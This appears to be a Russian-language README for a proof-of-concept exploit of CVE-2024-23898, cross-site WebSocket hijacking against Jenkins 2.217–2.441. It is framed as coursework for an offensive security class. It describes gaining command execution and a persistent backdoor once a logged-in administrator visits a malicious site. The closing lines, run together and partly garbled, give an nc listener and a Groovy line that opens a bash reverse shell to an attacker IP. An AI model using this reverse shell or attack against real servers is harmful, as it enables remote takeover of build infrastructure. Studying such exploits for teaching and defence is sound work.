
Доказательство концепции эксплуатации уязвимости перехвата WebSocket-соединений между сайтами (cross-site WebSocket hijacking) для CVE-2024-23898 — уязвимости, затрагивающей Jenkins версий 2.217–2.441. Предназначен для использования в образовательных целях в рамках курса Hacking & Offensive Security в Университете Карнеги-Меллона.
PoC-эксплойт межсайтового перехвата WebSocket для CVE-2024-23898 — уязвимости, затрагивающей версии Jenkins 2.217-2.441.
Этот эксплойт нацелен на Jenkins CLI, позволяющий удалённо подключаться к серверу управления Jenkins и выполнять на нём команды. С помощью этого эксплойта удалённый злоумышленник может получить доступ к серверу управления Jenkins и установить постоянный бэкдор, если администратор, будучи авторизованным на целевом сервере управления Jenkins, перейдёт на вредоносный сайт.
Этот код предназначен исключительно для образовательных целей и только для использования в рамках курса Hacking & Offensive Security в Университете Карнеги-Меллона. Этот код не должен использоваться как оружие или применяться для создания вредоносного ПО. Авторы решительно осуждают любые подобные попытки.
nc -l <port_num> (замените <port_num> на любой неиспользуемый номер порта)ipconfig getifaddr en0[http://localhost:8080/script](http://localhost:8080/script). Если вы ещё не вошли, выполните вход под учётной записью администратора.['bash', '-c', 'bash -i >& /dev/tcp/<attacker_ip>/<port_num> 0>&1'].execute()